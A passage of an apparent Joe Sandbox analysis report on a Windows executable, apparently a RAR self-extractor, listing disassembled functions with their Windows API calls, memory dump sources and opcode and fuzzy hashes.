                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item$DialogTextWindow
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3077722735-2177901306
                                                              • Opcode ID: 4ddb76cc2b1b2b03f57728b37ea35e22b499904da1f1d981c30b535267731455
                                                              • Instruction ID: 1fee9ea44de199bceacb4df86ecff55afc4e0a0dc2f305453b334492dd2fb5e0
                                                              • Opcode Fuzzy Hash: 4ddb76cc2b1b2b03f57728b37ea35e22b499904da1f1d981c30b535267731455
                                                              • Instruction Fuzzy Hash: B721F73125D244BBD6116F65DECCFABBB6CEB87755F010004F6019A090CB61AD01EB72
                                                              Function 009A7818 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 009A783D
                                                                • Part of subcall function 009A067E: GetVersionExW.KERNEL32(?), ref: 009A06AF
                                                              • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 009A7860
                                                              • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 009A7872
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 009A7883
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 009A7893
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 009A78A3
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 009A78DE
                                                              • __aullrem.LIBCMT ref: 009A7984
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              • Opcode ID: 6619f49316ffc765f61c0dcf0d551b7e8328efb1a0c6872dd0c67cf9aa3bc5cf
                                                              • Instruction ID: 14cfb938faf76bad7d2e1b4fe90047b132f0e69a9c6c411defc4e91f70b0e5b8
                                                              • Opcode Fuzzy Hash: 6619f49316ffc765f61c0dcf0d551b7e8328efb1a0c6872dd0c67cf9aa3bc5cf
                                                              • Instruction Fuzzy Hash: 3F512AB15083059FD710DFA5C88596BFBE9FB88714F40892EF59AC2210E734E549CB92
                                                              Function 009A0E49 Relevance: 10.7, APIs: 7, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009A0E50
                                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 009A0E85
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 009A0EC4
                                                              • _wcslen.LIBCMT ref: 009A0ED4
                                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 009A0F51
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 009A0F93
                                                              • _wcslen.LIBCMT ref: 009A0FA3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FullNamePath$_wcslen$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 840513527-0
                                                              • Opcode ID: 916e52fe67703b1dfdcc8b709c1622016a833f286722f2ee1bb7e6a2441cfa69
                                                              • Instruction ID: 92b1031fa0f2fa0b90afbdb700fdd5e791092bab7c091f1b7b137445f34eb46c
                                                              • Opcode Fuzzy Hash: 916e52fe67703b1dfdcc8b709c1622016a833f286722f2ee1bb7e6a2441cfa69
                                                              • Instruction Fuzzy Hash: C0615771D00249ABDF14DFA9D985EEEBBBAAFCA710F14411AF410F7290DB749940CBA1
                                                              Function 009C6239 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,009C69AE,?,00000000,?,00000000,00000000), ref: 009C627B
                                                              • __fassign.LIBCMT ref: 009C62F6
                                                              • __fassign.LIBCMT ref: 009C6311
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 009C6337
                                                              • WriteFile.KERNEL32(?,?,00000000,009C69AE,00000000,?,?,?,?,?,?,?,?,?,009C69AE,?), ref: 009C6356
                                                              • WriteFile.KERNEL32(?,?,00000001,009C69AE,00000000,?,?,?,?,?,?,?,?,?,009C69AE,?), ref: 009C638F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: 0c3dcc005dc6405e7a92944912ddd7b2d384019a86a0e085d341029d43fd3732
                                                              • Instruction ID: 3aeda99900ffaaa517c4acea5ebb39a417da9a2b66ecdbb359b864715121ecfe
                                                              • Opcode Fuzzy Hash: 0c3dcc005dc6405e7a92944912ddd7b2d384019a86a0e085d341029d43fd3732
                                                              • Instruction Fuzzy Hash: 88518EB1E102899FDB10CFA8D885FEEBBF8EB49310F14411EE956E7291D770A940CB61
                                                              Function 009B93C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 009B93F7
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 009B93FF
                                                              • _ValidateLocalCookies.LIBCMT ref: 009B9488
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 009B94B3
                                                              • _ValidateLocalCookies.LIBCMT ref: 009B9508
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: d16fb3a42dbc33a105aec5c049e4fc0f7ce122301fb8b0252b26dbdaa43129d7
                                                              • Instruction ID: 3510aeafadd8ae3736090c81951470230e8f1ce3051f4f1714ce74bb1b3c3adc
                                                              • Opcode Fuzzy Hash: d16fb3a42dbc33a105aec5c049e4fc0f7ce122301fb8b0252b26dbdaa43129d7
                                                              • Instruction Fuzzy Hash: 8841C234E10218AFCF10DF68C985ADEBBF6AF85334F148555E9159B3A2C731AE06CB91
                                                              Function 009AE265 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009AE26C
                                                              • ShowWindow.USER32(?,00000000,00000038), ref: 009AE294
                                                              • GetWindowRect.USER32(?,?), ref: 009AE2D8
                                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 009AE373
                                                              • ShowWindow.USER32(00000000,00000005), ref: 009AE394
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$H_prolog3_Rect
                                                              • String ID: RarHtmlClassName
                                                              • API String ID: 950582801-1658105358
                                                              • Opcode ID: 9523a65797da138e5cd34573b91b7eb38c9abdb25ed7dc6a7e052607106a756b
                                                              • Instruction ID: 1952d4d836a266e69f4b65ac2e226c98e4ba21616ad57689ed6b5d4237d53835
                                                              • Opcode Fuzzy Hash: 9523a65797da138e5cd34573b91b7eb38c9abdb25ed7dc6a7e052607106a756b
                                                              • Instruction Fuzzy Hash: CE414871909208EFDF119FA4DD89BAEBBB8EF49300F044059F904AB165DB319D41DBA1
                                                              Function 009C3554 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009C3518: _free.LIBCMT ref: 009C3541
                                                              • _free.LIBCMT ref: 009C35A2
                                                                • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
                                                                • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
                                                              • _free.LIBCMT ref: 009C35AD
                                                              • _free.LIBCMT ref: 009C35B8
                                                              • _free.LIBCMT ref: 009C360C
                                                              • _free.LIBCMT ref: 009C3617
                                                              • _free.LIBCMT ref: 009C3622
                                                              • _free.LIBCMT ref: 009C362D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                              • Instruction ID: fb7dabfbd69feccfd3fadb565d5a69cae7c57c63e22fd8b6bfa7992cc74cfd06
                                                              • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                              • Instruction Fuzzy Hash: F911C971D50B84FBE630BBB0CC47FCB779CAF84700F40881DB29DA6152DA75A6058792
                                                              Function 009B4D5F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,009B4DDA,009B4D3D,009B4FDE), ref: 009B4D76
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 009B4D8C
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 009B4DA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: c08f5f8c8f9bd0c38dd0113b672a2964720c75129c09bd437a3de0ac0bfd1d54
                                                              • Instruction ID: efba0528669a780bb26f2209d5c259ead08a5c70702eb18e1d620f430fa1a52d
                                                              • Opcode Fuzzy Hash: c08f5f8c8f9bd0c38dd0113b672a2964720c75129c09bd437a3de0ac0bfd1d54
                                                              • Instruction Fuzzy Hash: 23F04631F55A22AB0F228F745EC4BF623CCAAC533C3010538D602D62D2E620EC507692
                                                              Function 009C1609 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009BC5A2,009BC5A2,?,?,?,009C185A,00000001,00000001,C5E85006), ref: 009C1663
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009C185A,00000001,00000001,C5E85006,?,?,?), ref: 009C16E9
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009C17E3
                                                              • __freea.LIBCMT ref: 009C17F0
                                                                • Part of subcall function 009C040E: RtlAllocateHeap.NTDLL(00000000,009B535E,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?,?,?,?), ref: 009C0440
                                                              • __freea.LIBCMT ref: 009C17F9
                                                              • __freea.LIBCMT ref: 009C181E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: ac74df3a7a3dce14e0abd5e2c63ae314a410b9ab2853afbd391bd962dce89ab7
                                                              • Instruction ID: 148ec65ae133e915c0668478ad5843eda418128563321da099fc8681e3095b3d
                                                              • Opcode Fuzzy Hash: ac74df3a7a3dce14e0abd5e2c63ae314a410b9ab2853afbd391bd962dce89ab7
                                                              • Instruction Fuzzy Hash: 4D51D372E00216AFDB259F64CC41FBB77AAEB86750F29462CFC04D6142EB34DC90C65A
                                                              Function 009A7AA3 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 009A7B06
                                                                • Part of subcall function 009A067E: GetVersionExW.KERNEL32(?), ref: 009A06AF
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 009A7B2A
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 009A7B44
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 009A7B57
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 009A7B67
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 009A7B77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 5c7f3c1f91a25717a54d2004570640aab609e310358491725dd242c212838e5f
                                                              • Instruction ID: b31204aa14a8f5fefccbb1f218c99e41b8e6aec4b339db82cf1182bf7792b990
                                                              • Opcode Fuzzy Hash: 5c7f3c1f91a25717a54d2004570640aab609e310358491725dd242c212838e5f
                                                              • Instruction Fuzzy Hash: 044149B651C3059BC704DFA9C8859ABBBE8FF98714F04491EF989C7210E730D948CBA6
                                                              Function 009AF33B Relevance: 9.1, APIs: 6, Instructions: 102timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?,1AC349C0,?,?,?,?,009CAA27,000000FF), ref: 009AF38A
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,009CAA27,000000FF), ref: 009AF399
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,009CAA27,000000FF), ref: 009AF3A7
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,009CAA27,000000FF), ref: 009AF3B5
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,009CAA27,000000FF), ref: 009AF3D0
                                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,009CAA27,000000FF), ref: 009AF3FA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Time$System$File$Format$DateLocalSpecific
                                                              • String ID:
                                                              • API String ID: 909090443-0
                                                              • Opcode ID: b6ff905f441b9be0c31071ccf19d5fcdcd9fa8e5a7b94d9e95b375a582d01281
                                                              • Instruction ID: cb8d2770ba9041a2525b11c13ec6111c476c08861900e6429056c51c28539176
                                                              • Opcode Fuzzy Hash: b6ff905f441b9be0c31071ccf19d5fcdcd9fa8e5a7b94d9e95b375a582d01281
                                                              • Instruction Fuzzy Hash: 233119B2915189AFDB20DFA5DD85FEF77ACFB49704F00412AF90AD6141EB34AA04CB60
                                                              Function 009B977A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,009B9771,009B96CC,009B6A64), ref: 009B9788
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009B9796
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009B97AF
                                                              • SetLastError.KERNEL32(00000000,009B9771,009B96CC,009B6A64), ref: 009B9801
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 33d724237f94724da87b064e133e2ead0912f185721bfd904a3a1a4e24fb6e6d
                                                              • Instruction ID: a627093177a0cad7ce9752775bc7de3d43fc3dc73ed3fa18ec99fb3495143042
                                                              • Opcode Fuzzy Hash: 33d724237f94724da87b064e133e2ead0912f185721bfd904a3a1a4e24fb6e6d
                                                              • Instruction Fuzzy Hash: 2801F23227E311AEA6243FB47EE5AEA2BC8EB427B9731033AF621550E0EF114C40F141
                                                              Function 009C0005 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,009BB581,?,009DE088,?,009BAE80,?,009DE088,?,00000007), ref: 009C0009
                                                              • _free.LIBCMT ref: 009C003C
                                                              • _free.LIBCMT ref: 009C0064
                                                              • SetLastError.KERNEL32(00000000,009DE088,?,00000007), ref: 009C0071
                                                              • SetLastError.KERNEL32(00000000,009DE088,?,00000007), ref: 009C007D
                                                              • _abort.LIBCMT ref: 009C0083
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 8a9fe1556db3d208f171667625ab907194f022bf6947593d3d0fadb06c178356
                                                              • Instruction ID: ec1a5d3855f19f118c7b965a1a84a4cc8bb03ab130ed491bcc5b4ff8e4cc7b8b
                                                              • Opcode Fuzzy Hash: 8a9fe1556db3d208f171667625ab907194f022bf6947593d3d0fadb06c178356
                                                              • Instruction Fuzzy Hash: 84F0A436D58600E7D622B3786D0AF6B2A199BC2771F27011CF51CA2192EE348C42D226
                                                              Function 009B3FCF Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 009B3FDB
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009B3FF5
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B4006
                                                              • TranslateMessage.USER32(?), ref: 009B4010
                                                              • DispatchMessageW.USER32(?), ref: 009B401A
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 009B4025
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: bb09d32212737f114ed78b775e1cb45de432dce250955e9f4c2be803550ab35b
                                                              • Instruction ID: 1a7d39439d938834c644f254017c400595f382cebd80b496fa233856dcc5eead
                                                              • Opcode Fuzzy Hash: bb09d32212737f114ed78b775e1cb45de432dce250955e9f4c2be803550ab35b
                                                              • Instruction Fuzzy Hash: 86F04F72E05129BBCF20ABE1EC4CEDFBF6DEF453A2B004011F60AE6050E6349941DBA1
                                                              Function 009B2493 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 216windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000066), ref: 009B26A9
                                                              • SendMessageW.USER32(00000000,00000143,00000000,009E5380), ref: 009B26D6
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009B2702
                                                              Strings
                                                              • ProgramFilesDir, xrefs: 009B25E0
                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 009B25F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
